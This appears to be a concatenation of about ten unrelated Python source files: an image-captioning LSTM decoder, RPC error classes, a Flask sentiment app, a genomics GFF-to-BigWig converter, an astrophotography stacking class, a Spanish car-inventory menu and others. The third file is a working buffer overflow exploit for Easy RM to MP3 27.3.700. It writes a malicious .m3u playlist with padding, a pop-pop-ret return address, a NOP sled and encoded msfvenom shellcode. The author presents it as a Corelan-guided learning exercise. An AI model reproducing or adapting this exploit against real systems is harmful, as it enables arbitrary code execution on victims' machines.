self.vocab_size = vocab_size
self.num_layers = num_layers
self.embed = nn.Embedding(vocab_size, embed_size)
self.lstm = nn.LSTM(input_size=embed_size, hidden_size=hidden_size, num_layers=num_layers, dropout = 0.2, batch_first = True )
self.linear = nn.Linear(hidden_size, vocab_size)
self.hidden = (torch.zeros(1, 1, hidden_size),torch.zeros(1, 1, hidden_size))
def forward(self, features, captions):
features = features.unsqueeze(1)
cap_embedding = self.embed(captions[:,:-1])
embedding_vector = torch.cat((features, cap_embedding), 1)
lstm_out, self.hidden = self.lstm(embedding_vector)
outputs = self.linear(lstm_out)
return outputs
def sample(self, features, states=None, max_len=20):
" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) "
for i in range(max_len):
if states is None:
inputs = features
else:
embeddings = self.embed(states)
inputs = torch.cat((features, embeddings), 1)
lstm_out, hidden = self.lstm(inputs)
out = self.linear(lstm_out)
val, states = out.max(2)
output = states.tolist()[0]
return output |
# Builtin modules
# Local modules
# Program
class BaseRPCError(Exception):
def __init__(self, typ:str, message:str):
self.message = "{}: {}".format(typ, message)
super().__init__(self.message)
class InitializationError(BaseRPCError):
def __init__(self, message:str):
super().__init__("Initialization error", message)
class SocketError(BaseRPCError):
def __init__(self, message:str):
super().__init__("Socket error", message)
class MessageError(BaseRPCError):
def __init__(self, message:str):
super().__init__("Message error", message)
class RequestError(BaseRPCError):
def __init__(self, message:str):
super().__init__("Request error", message)
class ResponseError(BaseRPCError):
def __init__(self, message:str):
super().__init__("Response error", message)
|
#!/usr/bin/python
# Author: Michael Music
# Date: 2/17/2019
# Description: Easy RM to MP3 27.3.700 Buffer Overflow Exploit
# Exercise in BOFs following the corelan guide
# Tested on Windows Server 2012
# Notes: Required alteration in prepended \x41s and POPs to jump to shellcode
# !mona find -s "\x58\x5d\xc3" -m "MSRMfilter03.dll"
# This version simulates an EIP+8 shellcode location via 1 \xcc and 7 NOPs at EIP
# The exploit gets around this by popping 8 bytes off the stack (pop pop ret address overwritten at EIP)
# and uses a PUSH ESP instruction at EIP+8 to execute the shellcode
# I will be creating other variations of this exploit to test other shellcode
# execution methods
out = 'crash.m3u'
junk = '\x41' * 26079
espdata = '\x43' * 442
preshellcode = 'XXXX'
address = '\x42' * 4
nop = '\x90'
br = '\xcc'
push_esp = '\x58\xb0\x01\x10'
pop_pop_ret = '\xca\xb6\x02\x10'
# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -e x86/alpha_mixed
buf = br + (nop * 7) + push_esp + (nop * 25)
buf += "\x89\xe2\xd9\xc9\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6c"
buf += "\x42\x53\x30\x55\x50\x33\x30\x51\x70\x6e\x69\x4d\x35"
buf += "\x45\x61\x6b\x70\x55\x34\x6e\x6b\x66\x30\x34\x70\x6c"
buf += "\x4b\x42\x72\x54\x4c\x4e\x6b\x32\x72\x34\x54\x6c\x4b"
buf += "\x62\x52\x46\x48\x36\x6f\x4d\x67\x61\x5a\x34\x66\x64"
buf += "\x71\x59\x6f\x6c\x6c\x55\x6c\x53\x51\x31\x6c\x63\x32"
buf += "\x56\x4c\x51\x30\x69\x51\x78\x4f\x34\x4d\x77\x71\x68"
buf += "\x47\x79\x72\x4b\x42\x36\x32\x51\x47\x6e\x6b\x63\x62"
buf += "\x32\x30\x6e\x6b\x53\x7a\x65\x6c\x4e\x6b\x42\x6c\x62"
buf += "\x31\x30\x78\x4a\x43\x47\x38\x53\x31\x6e\x31\x66\x31"
buf += "\x6c\x4b\x46\x39\x71\x30\x55\x51\x6a\x73\x6e\x6b\x63"
buf += "\x79\x66\x78\x79\x73\x67\x4a\x31\x59\x6e\x6b\x55\x64"
buf += "\x6c\x4b\x66\x61\x79\x46\x55\x61\x39\x6f\x6c\x6c\x69"
buf += "\x51\x38\x4f\x34\x4d\x46\x61\x58\x47\x50\x38\x4d\x30"
buf += "\x52\x55\x68\x76\x66\x63\x61\x6d\x38\x78\x55\x6b\x53"
buf += "\x4d\x65\x74\x54\x35\x6b\x54\x42\x78\x6e\x6b\x72\x78"
buf += "\x34\x64\x35\x51\x59\x43\x73\x56\x4e\x6b\x76\x6c\x70"
buf += "\x4b\x6e\x6b\x72\x78\x47\x6c\x66\x61\x6e\x33\x4e\x6b"
buf += "\x74\x44\x4e\x6b\x53\x31\x48\x50\x6b\x39\x77\x34\x71"
buf += "\x34\x55\x74\x51\x4b\x61\x4b\x63\x51\x56\x39\x43\x6a"
buf += "\x50\x51\x59\x6f\x4b\x50\x61\x4f\x43\x6f\x51\x4a\x4c"
buf += "\x4b\x56\x72\x7a\x4b\x6e\x6d\x71\x4d\x33\x5a\x76\x61"
buf += "\x6c\x4d\x6b\x35\x6e\x52\x67\x70\x53\x30\x45\x50\x42"
buf += "\x70\x53\x58\x65\x61\x6c\x4b\x62\x4f\x4b\x37\x4b\x4f"
buf += "\x6a\x75\x4f\x4b\x6c\x30\x78\x35\x49\x32\x42\x76\x71"
buf += "\x78\x59\x36\x4f\x65\x4f\x4d\x6f\x6d\x39\x6f\x49\x45"
buf += "\x45\x6c\x64\x46\x63\x4c\x76\x6a\x6f\x70\x49\x6b\x49"
buf += "\x70\x51\x65\x67\x75\x4d\x6b\x77\x37\x35\x43\x31\x62"
buf += "\x50\x6f\x50\x6a\x75\x50\x42\x73\x49\x6f\x49\x45\x61"
buf += "\x73\x75\x31\x52\x4c\x51\x73\x66\x4e\x33\x55\x44\x38"
buf += "\x62\x45\x67\x70\x41\x41"
buf += '\x43' * 400
exploit_string = junk + pop_pop_ret + preshellcode + buf
text = open(out, 'w')
text.write(exploit_string)
text.close
|
import pandas as pd
# noinspection PyUnresolvedReferences
from extractor import FeaturesExtractor
from flask import Flask, render_template, request
from sklearn.externals import joblib
app = Flask(__name__)
model = joblib.load('model.pkl')
@app.route('/', methods=['GET', 'POST'])
def index_page(text='', label='', color='orange'):
if request.method == "POST":
text = request.form["text"]
if len(text):
X = pd.DataFrame([['', text]], columns=['title', 'text'])
label = model.predict(X)[0]
if not isinstance(label, str):
if label < 3:
color = 'red'
elif label > 3:
color = 'green'
return render_template('hello.html', text=text, label=label, color=color)
if __name__ == '__main__':
app.run()
|
"""Exploring the font metrics in the freetype-py API to enable proper character placement"""
import freetype
import svgpathtools
import svgwrite
from freetype import Face
from svgpathtools import Line, Path, QuadraticBezier, wsvg
import re
import barcode_wheel
if __name__ == "__main__":
drawing = svgwrite.Drawing(filename="font_metrics.svg", size=("100%", "100%"))
path, metrics = barcode_wheel.char_to_path("a")
drawing.add(drawing.path(d=path.d()))
names = [
"width",
"height",
"horiAdvance",
"horiBearingX",
"horiBearingY",
"vertAdvance",
"vertBearingX",
"vertBearingY",
]
metrics_re = re.compile(r"(?i)(height)|(width)|(hori.*)|(vert.*)")
interesting_metrics = filter(None, map(metrics_re.match, dir(metrics)))
interesting_metric_names = [
match_group.string for match_group in interesting_metrics
]
metrics_values = {name: getattr(metrics, name) for name in interesting_metric_names}
max_metric = max(metrics_values.values())
min_metric = min(metrics_values.values())
character_top_right = {"x": metrics.horiBearingX, "y": metrics.horiBearingY}
character_bbox = {
"tr": (metrics.horiBearingX + metrics.width, 0),
"tl": (metrics.horiBearingX, 0),
"br": (metrics.horiBearingX + metrics.width, metrics.height),
"bl": (metrics.horiBearingX, metrics.height),
}
for x, y in character_bbox.values():
drawing.add(
drawing.circle(
center=(x, y),
r=((max_metric - min_metric) * 0.01),
opacity=0.5,
fill="blue",
)
)
face = barcode_wheel.get_font_face()
face.set_char_size(2 ** 16)
face.load_char("a")
bbox = face.glyph.outline.get_bbox()
drawing.viewbox(0, 0, bbox.xMax - bbox.xMin, bbox.yMax - bbox.yMin)
drawing.fit()
drawing.save()
|
import os
from testcontainers.postgres import PostgresContainer
import psycopg2
from contextlib import contextmanager
def get_migration_files():
path = os.path.join(os.path.dirname(__file__), os.pardir, "migration")
files = os.listdir(path)
files.sort()
for f in files:
yield os.path.join(path, f)
def migrate(conn):
cur = conn.cursor()
for f in get_migration_files():
with open(f) as fp:
stmt = " ".join(fp.readlines())
cur.execute(stmt)
conn.commit()
@contextmanager
def migrated_testcontainer():
with PostgresContainer("postgres:13.0") as postgres:
os.environ["DATABASE"] = 'test'
os.environ["HOST"] = postgres.get_container_host_ip()
os.environ["PORT"] = postgres.get_exposed_port(5432)
os.environ["USERNAME"] = postgres.POSTGRES_USER
os.environ["PASSWORD"] = postgres.POSTGRES_PASSWORD
dsn = f"dbname='test' host='{postgres.get_container_host_ip()}' port='{postgres.get_exposed_port(5432)}' user='{postgres.POSTGRES_USER}' password='{postgres.POSTGRES_PASSWORD}'"
conn = psycopg2.connect(dsn)
migrate(conn)
yield dsn
|
import sys, math, glob, multiprocessing, subprocess, os, bisect, random
# Usage: python gff_to_bigwig_pe_v3.py [-q] [-h] [-keep] [-sort] [-o=out_ids]
# [-p=num_proc] [-s=gff_search_term] <chrm_sizes> <gff_fille> [gff_file]*
NUMPROC = 1
SEARCHTERM='frac'
def processInputs( gffFileAr, chrmFileStr, keepTmp, outIdAr, searchTerm, numProc, isSort, isPrint ):
nFiles = len(gffFileAr)
if isPrint:
print( 'Keep temp files:', keepTmp)
print( 'Sort bedGraph:', isSort )
print( 'GFF notes search term:', searchTerm )
# adjust out ids
if len(outIdAr) == 1 and nFiles > 1:
outIdAr = outIdAr * nFiles
elif len(outIdAr) != nFiles:
print( 'ERROR: number of output ids does not match number of input files' )
exit()
if isPrint:
print( 'Begin processing {:d} files with {:d} processors'.format( nFiles, numProc ) )
pool = multiprocessing.Pool( processes=numProc )
results = [ pool.apply_async( processFile, args=(gffFileAr[i], chrmFileStr, outIdAr[i], keepTmp, searchTerm, isSort, isPrint) ) for i in range(nFiles) ]
suc = [ p.get() for p in results ]
if isPrint:
print( 'Done' )
def processFile( gffFileStr, chrmFileStr, outId, keepTemp, searchTerm, isSort, isPrint ):
# get output id
if outId == None:
outId = gffFileStr.replace('.gff', '' )
if not outId.endswith( '_v3'):
outId += '_v3'
if isPrint:
print( 'Reading GFF file {:s}'.format( os.path.basename( gffFileStr ) ) )
bedGraphStr = outId + '.bedGraph'
bedGraphAr = readGFF( gffFileStr, bedGraphStr, searchTerm )
print(bedGraphAr)
if len(bedGraphAr) == 0:
print( 'ERROR: no m4C, m5C, or m6A features found in GFF file' )
exit()
if isSort:
if isPrint:
print( 'Sorting bedGraph files' )
for b in bedGraphAr:
sortBedFile( b )
if isPrint:
print( 'Converting {:s} to BigWig'.format( ', '.join(bedGraphAr) ) )
for b in bedGraphAr:
processBedGraph( b, chrmFileStr )
if not keepTemp:
if isPrint:
print ( 'Removing temporary files' )
for b in bedGraphAr:
os.remove( b)
print( 'BigWig finished for {:s}.*'.format( bedGraphStr.replace( 'bedGraph', 'bw' ) ) )
def readGFF( gffFileStr, bedGraphStr, searchTerm ):
outTypes = ['4mc', '5mc', '6ma']
validTypes = ['4mc', 'm4c', '5mc', 'm5c', '6ma', 'm6a']
validOut = [0, 0, 1, 1, 2, 2]
if not searchTerm.endswith( '=' ):
searchTerm += '='
bedGraphStrAr = [ bedGraphStr + '.' + x for x in outTypes]
bedGraphAr = [ open( x, 'w' ) for x in bedGraphStrAr ]
isUsed = [ False for x in outTypes ]
inFile = open( gffFileStr, 'r' )
for line in inFile:
line = line.rstrip()
# (0) chrm (1) source (2) feature (3) start (4) end (5) score
# (6) strand (7) frame (8) notes
lineAr = line.split( '\t' )
if line.startswith( '#' ) or len( lineAr ) < 9:
continue
featType = lineAr[2].lower()
featInt = indexOf( validTypes, featType )
if featInt == -1:
continue
outInt = validOut[featInt]
chrm = lineAr[0]
pos = int( lineAr[3] ) - 1
# get frac value
valueStr = searchNotes(lineAr[8], searchTerm)
value = convertValue( valueStr, lineAr[6] )
if value != '':
# add to output
# (0) chrm (1) start (2) end (3) value
if isUsed[outInt] == False:
isUsed[outInt] = True
bedGraphAr[outInt].write( '{:s}\t{:d}\t{:d}\t{:s}\n'.format( chrm, pos, pos+1, value ) )
# end for line
inFile.close()
# determine used files, close and remove as necessary
outFilesAr = []
for i in range(len(outTypes)):
bedGraphAr[i].close()
if isUsed[i]:
outFilesAr += [bedGraphStrAr[i]]
else:
os.remove(bedGraphStrAr[i])
# end for i
return outFilesAr
def sortBedFile( bedFileStr ):
command = 'bedSort {:s} {:s}'.format( bedFileStr, bedFileStr )
subprocess.call( command, shell=True )
def processBedGraph( bedGraphStr, chrmFileStr ):
bigWigStr = bedGraphStr.replace( '.bedGraph', '.bw' )
# bedGraphToBigWig in.bedGraph chrom.sizes out.bw
command = 'bedGraphToBigWig {:s} {:s} {:s}'.format( bedGraphStr, chrmFileStr, bigWigStr )
subprocess.call( command, shell=True)
def indexOf( inAr, search ):
try:
i = inAr.index( search )
return i
except ValueError:
return -1
def searchNotes( notesStr, searchStr ):
index = notesStr.find( searchStr )
if index == -1:
return ''
adIndex = index + len( searchStr )
endIndex = notesStr[adIndex:].find( ';' )
if endIndex == -1:
return notesStr[adIndex:]
else:
newIndex = endIndex+adIndex
return notesStr[adIndex:newIndex]
def convertValue( valueStr, strand ):
try:
# convert to float
value = float( valueStr )
if value > 1:
value = value / 100
if strand == '-':
value = value * -1
# convert to string and return
return '{:.6f}{:d}'.format( value, 1 )
except ValueError:
return ''
def parseInputs( argv ):
numProc = NUMPROC
outIdAr = [None]
keepTmp = False
isSort = False
isPrint = True
searchTerm = SEARCHTERM
startInd = 0
for i in range( min(5, len(argv)-2) ):
if argv[i] in [ '-h', '--help', '-help']:
printHelp()
exit()
elif argv[i] == '-q':
isPrint = False
startInd += 1
elif argv[i] == '-keep':
keepTmp = True
startInd += 1
elif argv[i] == '-sort':
isSort = True
startInd += 1
elif argv[i].startswith( '-s=' ):
searchTerm = argv[i][3:]
startInd += 1
elif argv[i].startswith( '-o=' ):
outIdAr = argv[i][3:].split(',')
startInd += 1
elif argv[i].startswith( '-p=' ):
try:
numProc = int( argv[i][3:] )
except ValueError:
print( 'WARNING: number of processors must be integer...using default', NUMPROC )
numProc = NUMPROC
startInd += 1
elif argv[i].startswith( '-' ):
print( 'ERROR: {:s} is not a valid parameter...use -h for help'.format( argv[i] ) )
exit()
# end for i
chrmFileStr = argv[startInd]
gffFileAr = []
allCFileAr = []
for j in range(startInd+1, len(argv) ):
gffFileAr += [ argv[j] ]
processInputs( gffFileAr, chrmFileStr, keepTmp, outIdAr, searchTerm, numProc, isSort, isPrint )
def printHelp():
print()
print( 'Usage:\tpython3 gff_to_bigwig_pe_v3.py [-q] [-h] [-keep] [-sort] [-o=out_ids]\n\t[-p=num_proc] [-s=gff_search_term] <chrm_sizes> <gff_fille> [gff_file]*' )
print()
print( 'Converts GFF files to context-specific BigWig files' )
print( 'Note: bedGraphToBigWig and bedSort programs must be in the path' )
print()
print( 'Required:' )
print( 'chrm_file\ttab-delimited file with chromosome names and lengths,\n\t\ti.e. fasta index file' )
print( 'gff_file\tgff file with 4mC and/or 6mA positions on all chrms' )
print()
print( 'Optional:' )
print( '-keep\t\tkeep intermediate files' )
print( '-sort\t\tcalls bedSort; add this option if bigwig conversion fails' )
print( '-s=gff_search\tGFF attribute which has methylation level\n\t\t[default "frac"]' )
print( '-o=out_id\toptional ID for output files [default from input file name]\n\t\tif one ID specified, applied to all input GFFs\n\t\tcomma-separated list IDs for multiple GFFs' )
print( '-p=num_proc\tnumber of processors to use [default 1]' )
if __name__ == "__main__":
if len(sys.argv) < 3 :
printHelp()
else:
parseInputs( sys.argv[1:] )
|
# soggetto.py
import re
import time
from sound import audio_sequence
SOLFEGE_MAP = {
'a': 'fa',
'e': 're',
'i': 'mi',
'o': 'sol',
'u': 'ut'
}
NOTE_MAP = {
'a': 'F',
'e': 'D',
'i': 'E',
'o': 'C',
'u': 'G'
}
def encode_string(text):
"""Enocdes the text in music using the simple soggetto cavato
method from the 16th century 'soggetto cavato dalle vocali di
queste parole.'
Prameters:
text (str): The text to encode in music.
Returns:
solfege (list(str)): The solfege terms for the encoding.
notes (list(str)): The note values for the encoding (e.g. 'C').
"""
# extract vowels from text
vowel_pattern = r'[^AEIOU]'
vowels = re.sub(vowel_pattern, '', text, flags=re.IGNORECASE).lower()
# encode solfege and notes
solfege = [SOLFEGE_MAP[v] for v in vowels]
notes = [NOTE_MAP[v] for v in vowels]
return solfege, notes
def main():
"""Accept user input, encode it, export the corresponding audio
and print the encoding to console.
"""
text = input('Please enter text to be encoded:\n')
solfege, notes = encode_string(text)
audio = audio_sequence(notes)
# export audio
fname = f'soggetto_cavato_{time.strftime("%Y%m%d-%H%M%S")}.wav'
audio.export(f'audio/{fname}')
# print encoding
print('Solfege:', ' '.join(solfege))
print('Notes', ' '.join(notes))
if __name__ == '__main__':
main()
|
import numpy as np
import numpy.ma as ma
import os
from PIL import Image
from skimage.transform import rotate
class ImageStack:
def __init__(self, image, samples):
self.image = image
self.samples = samples
@classmethod
def create_average_frame(cls, directory, files, color_mode):
frame_0 = cls._load_frame(files[0], dtype=np.int32, color_mode=color_mode)
width, height, channels = frame_0.shape
image = np.zeros((width, height, channels), dtype=float)
for filename in files:
frame = cls._load_frame(filename, dtype=float, color_mode=color_mode)
image[:, :, :] += frame
image /= float(len(files))
image = np.clip(image, 0.0, 255.0)
return image
@classmethod
def from_files(cls, directory, files, offsets, color_mode, master_dark, master_flat):
# old method which is using a dict mapping file basename to x,y offsets (pixels)
max_offset_x = int(max(x for x, _ in offsets.values()))
min_offset_x = int(min(x for x, _ in offsets.values()))
min_offset_y = int(min(y for _, y in offsets.values()))
max_offset_y = int(max(y for _, y in offsets.values()))
frame_0 = cls._load_frame(files[0], dtype=np.int32, color_mode=color_mode)
width, height, channels = frame_0.shape
output_width = width + abs(min_offset_x) + abs(max_offset_x)
output_height = height + abs(min_offset_y) + abs(max_offset_y)
image = np.zeros((output_width, output_height, channels), dtype=float)
samples = np.zeros((output_width, output_height), dtype=np.int16)
for filename in files:
filename = os.path.basename(filename)
offset_x, offset_y = offsets[filename]
filepath = os.path.join(directory, filename)
frame = cls._load_frame(filepath, dtype=float, color_mode=color_mode)
if master_dark is not None:
frame -= master_dark
if master_flat is not None:
frame /= master_flat
x = int(offset_x)+abs(min_offset_x)
y = int(offset_y)+abs(min_offset_y)
image[x:x+width, y:y+height, :] += frame
samples[x:x+width, y:y+height] += 1
return ImageStack(image, samples)
@classmethod
def stack_frames(cls, frames, color_mode, master_dark, master_flat):
max_offset_x = max(frame.pixel_offset[0] for frame in frames)
max_offset_y = max(frame.pixel_offset[1] for frame in frames)
frame_0 = cls._load_frame(frames[0].filepath, dtype=np.int32, color_mode=color_mode)
width, height, channels = frame_0.shape
output_width = width + max_offset_x
output_height = height + max_offset_y
image = np.zeros((output_width, output_height, channels), dtype=float)
samples = np.zeros((output_width, output_height), dtype=float)
for frame in frames:
frame_image = cls._load_frame(frame.filepath, dtype=float, color_mode=color_mode)
samples_image = np.ones((width, height), dtype=float)
if master_dark is not None:
frame_image -= master_dark
if master_flat is not None:
frame_image /= master_flat
frame_image = rotate(frame_image, frame.angle)
samples_image = rotate(samples_image, frame.angle)
x, y = frame.pixel_offset
image[x:x+width, y:y+height, :] += frame_image
samples[x:x+width, y:y+height] += samples_image
for channel in range(channels):
c = image[:, :, channel]
image[:, :, channel] = np.divide(c, samples, out=np.zeros_like(c), where=samples != 0)
return ImageStack(image, samples)
@classmethod
def stack_frames_inmem(cls, frames, color_mode, master_dark, master_flat):
# pixel scale seems to differ a little between frames, must average
pixel_scales = [frame.pixel_scale for frame in frames]
average_pixel_scale_aspp = sum(pixel_scales) / len(pixel_scales)
reference_frame = frames[0]
offsets = {
frame: frame.get_pixel_offset(reference_frame, average_pixel_scale_aspp)
for frame in frames
}
max_offset_x = int(max(x for x, _ in offsets.values()))
min_offset_x = int(min(x for x, _ in offsets.values()))
min_offset_y = int(min(y for _, y in offsets.values()))
max_offset_y = int(max(y for _, y in offsets.values()))
frame_0 = cls._load_frame(frames[0].filepath, dtype=np.int32, color_mode=color_mode)
width, height, channels = frame_0.shape
output_width = width + abs(min_offset_x) + abs(max_offset_x)
output_height = height + abs(min_offset_y) + abs(max_offset_y)
num_frames = len(frames)
# create avg and std images based on a sample,
stack = np.zeros((num_frames, output_width, output_height, channels), dtype=float)
for frame_index, frame in enumerate(frames[:100]):
offset_x, offset_y = offsets[frame]
frame_image = cls._load_frame(frame.filepath, dtype=float, color_mode=color_mode)
if master_dark is not None:
frame_image -= master_dark
if master_flat is not None:
frame_image /= master_flat
frame_image = rotate(frame_image, frame.angle)
x = int(offset_x) + abs(min_offset_x)
y = int(offset_y) + abs(min_offset_y)
stack[frame_index, x:x+width, y:y+height, :] = frame_image
average_image = np.average(stack, axis=0)
stddev_image = np.std(stack, axis=0)
# load all frames, apply average/stddev filter, and build output image progressively
image = np.zeros((output_width, output_height, channels), dtype=float)
samples = np.zeros((output_width, output_height), dtype=np.int16)
for frame_index, frame in enumerate(frames):
offset_x, offset_y = offsets[frame]
frame_image = cls._load_frame(frame.filepath, dtype=float, color_mode=color_mode)
frame_samples = np.ones((width, height), dtype=np.int16)
if master_dark is not None:
frame_image -= master_dark
if master_flat is not None:
frame_image /= master_flat
frame_image = rotate(frame_image, frame.angle)
frame_samples = rotate(frame_samples, frame.angle)
x = int(offset_x) + abs(min_offset_x)
y = int(offset_y) + abs(min_offset_y)
max_dev = 3
mask = (stddev_image * max_dev) < np.abs(frame_image - average_image)
frame_image_ma = ma.array(frame_image, mask=mask)
image[x:x+width, y:y+height, :] += frame_image_ma
samples[x:x+width, y:y+height] += frame_samples.astype(np.int16)
return ImageStack(image, samples)
@classmethod
def from_frames_old(cls, frames, offsets):
max_offset_x = int(max(x for x, _ in offsets))
min_offset_x = int(min(x for x, _ in offsets))
min_offset_y = int(min(y for _, y in offsets))
max_offset_y = int(max(y for _, y in offsets))
width, height, channels = frames[0].shape
output_width = width + abs(min_offset_x) + abs(max_offset_x)
output_height = height + abs(min_offset_y) + abs(max_offset_y)
image = np.zeros((output_width, output_height, channels), dtype=float)
samples = np.zeros((output_width, output_height), dtype=np.int16)
for frame, (offset_x, offset_y) in zip(frames, offsets):
x = int(offset_x)+abs(min_offset_x)
y = int(offset_y)+abs(min_offset_y)
image[x:x+width, y:y+height, :] += frame
samples[x:x+width, y:y+height] += 1
return ImageStack(image, samples)
@staticmethod
def _get_sharpness(xyc_image):
xy_image = np.sum(xyc_image, axis=2)
gy, gx = np.gradient(xy_image)
gnorm = np.sqrt(gx**2 + gy**2)
return np.average(gnorm)
@staticmethod
def _load_frame(filename, dtype, color_mode='rgb'):
pil_image = Image.open(filename)
np_image = np.asarray(pil_image, dtype=dtype)
if np_image.ndim == 3:
xyc_image = np.transpose(np_image, (1, 0, 2))
else:
grayscale_image = np.transpose(np_image, (1, 0))
grayscale_image = np.flipud(grayscale_image)
xyc_image = np.expand_dims(grayscale_image, axis=2)
# color mode does not make sense if image is grayscale from the start
return xyc_image
if color_mode == 'r':
xyc_image = np.expand_dims(xyc_image[:, :, 0], axis=2)
elif color_mode == 'g':
xyc_image = np.expand_dims(xyc_image[:, :, 1], axis=2)
elif color_mode == 'b':
xyc_image = np.expand_dims(xyc_image[:, :, 2], axis=2)
elif color_mode == 'grey':
grayscale_image = xyc_image[:, :, 0] * 0.21 + xyc_image[:, :, 1] * 0.72 + xyc_image[:, :, 2] * 0.07
xyc_image = np.expand_dims(grayscale_image, axis=2)
return xyc_image
def normalize(self):
for channel in range(self.image.shape[2]):
min_value = np.amin(self.image[:, :, channel])
max_value = np.amax(self.image[:, :, channel])
if max_value == 0:
print(f'Skipping channel {channel} in normalization')
continue
print(f'Normalizing channel {channel}, min={min_value:.1f}, max={max_value:.1f}')
if max_value > min_value:
self.image[:, :, channel] = (self.image[:, :, channel] - min_value) / (max_value - min_value)
else:
self.image[:, :, channel] = (self.image[:, :, channel] - min_value)
def crop(self, cx, cy, r):
# crop image to a square with center <cx,cy> and radius <>.
self.image = self.image[cx-r:cx+r, cy-r:cy+r, :]
self.samples = self.samples[cx-r:cx+r, cy-r:cy+r]
def auto_crop(self, min_samples=None, inset=50):
width, height = self.samples.shape
min_x, max_x, min_y, max_y = None, None, None, None
for x in range(width):
for y in range(height):
if self.samples[x, y] >= min_samples:
min_x = min(min_x or x, x)
max_x = max(max_x or x, x)
min_y = min(min_y or y, y)
max_y = max(max_y or y, y)
min_x += inset
min_y += inset
max_x -= inset
max_y -= inset
print(f'Cropping image to x=[{min_x},{max_x}], y=[{min_y},{max_y}]')
self.image = self.image[min_x:max_x+1, min_y:max_y+1, :]
self.samples = self.samples[min_x:max_x+1, min_y:max_y+1]
def apply_gamma(self, gamma):
self.image = np.power(self.image, gamma)
def apply_function(self, f):
self.image = np.vectorize(f)(self.image)
def invert(self):
self.image = 1.0 - self.image
def save(self, filename):
out_image = (255.0 * self.image)
yxc_image = np.transpose(out_image, (1, 0, 2))
yxc_image = yxc_image.astype(np.int8)
if yxc_image.shape[2] == 1:
# expand image to three equal channels
expanded_image = np.zeros((yxc_image.shape[0], yxc_image.shape[1], 3), dtype=np.int8)
expanded_image[:, :, 0] = yxc_image[:, :, 0]
expanded_image[:, :, 1] = yxc_image[:, :, 0]
expanded_image[:, :, 2] = yxc_image[:, :, 0]
yxc_image = expanded_image
pil_image = Image.fromarray(yxc_image, mode='RGB')
pil_image.save(filename)
def save_samples_map(self, filename, num_shades=8):
out_image = self.samples * (256.0 / num_shades)
yx_image = np.transpose(out_image, (1, 0))
yx_image = yx_image.astype(np.uint8)
pil_image = Image.fromarray(yx_image, mode='L')
pil_image.save(filename)
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
__autor__='Angel Alvarez'
from vehicle_model import Vehicle
from car_model import Car
def saliendo():
print
print "Gracias por usar GestiCar Soft."
raw_input("Cerrando. Pulse cualquier tecla..")
def desea_salir(salir):
if salir == 's' or salir == 'S':
return True
else:
return False
def es_opcion(opc):
if opc == 1 or opc == 2 or opc == 3:
return True
else:
return False
def es_si_o_es_no(opc):
if opc=='s' or opc=='S':
return True
elif opc=='n' or opc=='N':
return False
else:
return None
def es_numero(num):
lo_es = None
try:
numerete = int(num)
lo_es = True
except ValueError:
lo_es = False
return lo_es
def dame_el_numero(opc):
opcion = None
try:
opcion = int(opc)
except ValueError:
opcion = -1
return opcion
def muestra_menu():
print
print "Seleccione una opción:"
print "1.-Listar vehículos."
print "2.-Editar kilómetros y fecha ITV."
print "3.-Añadir vehículo."
print "Pulse 'S' para salir."
print
return raw_input("¿Que opción desea?: ")
def dame_atributos(indice):
if indice == 0:
return "Marca"
elif indice == 1:
return "Modelo"
elif indice == 2:
return "Tipo vehiculo"
elif indice == 3:
return "Kms"
elif indice == 4:
return "ITV"
else:
return None
def listar_vehiculos(cars):
for indice, coches in enumerate(cars):
print "ID: " + str(indice)
print coches.get_full_vehicle()
print coches.get_full_car()
print
if not cars:
print "No existen vehículos."
def editar_vehiculos(cars):
listar_vehiculos(cars)
es_todo_correcto = False
while not es_todo_correcto:
edit_opcion = raw_input("Seleccione el vehiculo: ")
if es_numero(edit_opcion):
if not dame_el_numero(edit_opcion) >= len(cars):
vehiculo_seleccionado = cars[dame_el_numero(edit_opcion)]
es_todo_correcto = True
else:
print "No ha seleccionado correctamente un vehiculo."
else:
print "No es correcto."
es_todo_correcto = False
print
print "Vehiculo seleccionado: {}".format(vehiculo_seleccionado.get_full_vehicle())
while not es_todo_correcto:
actualizar_kms = raw_input("Introduzca los kilometros del vehiculo: ")
if es_numero(actualizar_kms):
vehiculo_seleccionado.kms_realizados = actualizar_kms
es_todo_correcto = True
else:
print "Error al introducir los datos."
es_todo_correcto = False
while not es_todo_correcto:
actualizar_ITV = raw_input("Introduzca la proxima revision tecnica (ITV): ")
if es_numero(actualizar_ITV):
vehiculo_seleccionado.itv = actualizar_ITV
es_todo_correcto = True
else:
print "Error al introducir los datos."
print
print "Kilometros e ITV actualizados."
def alta_nuevo_coche(cars):
print "Añadir un vehiculo: "
n_marca = raw_input("Introduzca la marca del vehiculo: ")
n_modelo = raw_input("Introduzca el modelo del vehiculo: ")
n_tipo = raw_input("Introduzca el tipo de vehiculo ('Turismo/Furgoneta/Motocicleta'): ")
es_nuevo = raw_input("¿El vehiculo está adquirido como nuevo? ('S'/'N'): ")[0]
es_nuevo.upper()
if es_si_o_es_no(es_nuevo):
n_kms = 0
else:
n_kms = raw_input("Introduzca los kilometros del vehiculo: ")
todo_correcto = False
while not todo_correcto:
n_itv = raw_input("Introduzca el año de compra del vehiculo: ")
if es_numero(n_itv):
itv = dame_el_numero(n_itv) + 4
todo_correcto = True
else:
print "El año no es correcto."
nuevo_vehiculo = Car(n_kms, itv, n_marca, n_modelo, n_tipo)
cars.append(nuevo_vehiculo)
print "Añadido nuevo vehiculo."
def main():
car2 = Car(53232, 2019, "Seat", "Alhambra", "Turismo")
car3 = Car(215000, 2019, "VW", "Golf IV", "Turismo")
car4 = Car(0, 2023, "BMW", "Serie 2 Gran Tourer", "Turismo")
cochazos = [car2, car3, car4]
opcion = False
salir = False
while not salir:
opcion = muestra_menu()[0]
if es_numero(opcion):
if es_opcion(dame_el_numero(opcion)):
la_opcion = dame_el_numero(opcion)
if la_opcion == 1:
listar_vehiculos(cochazos)
elif la_opcion == 2:
editar_vehiculos(cochazos)
elif la_opcion == 3:
alta_nuevo_coche(cochazos)
elif la_opcion == -1:
print "Lo siento, la opcion no es validad."
else:
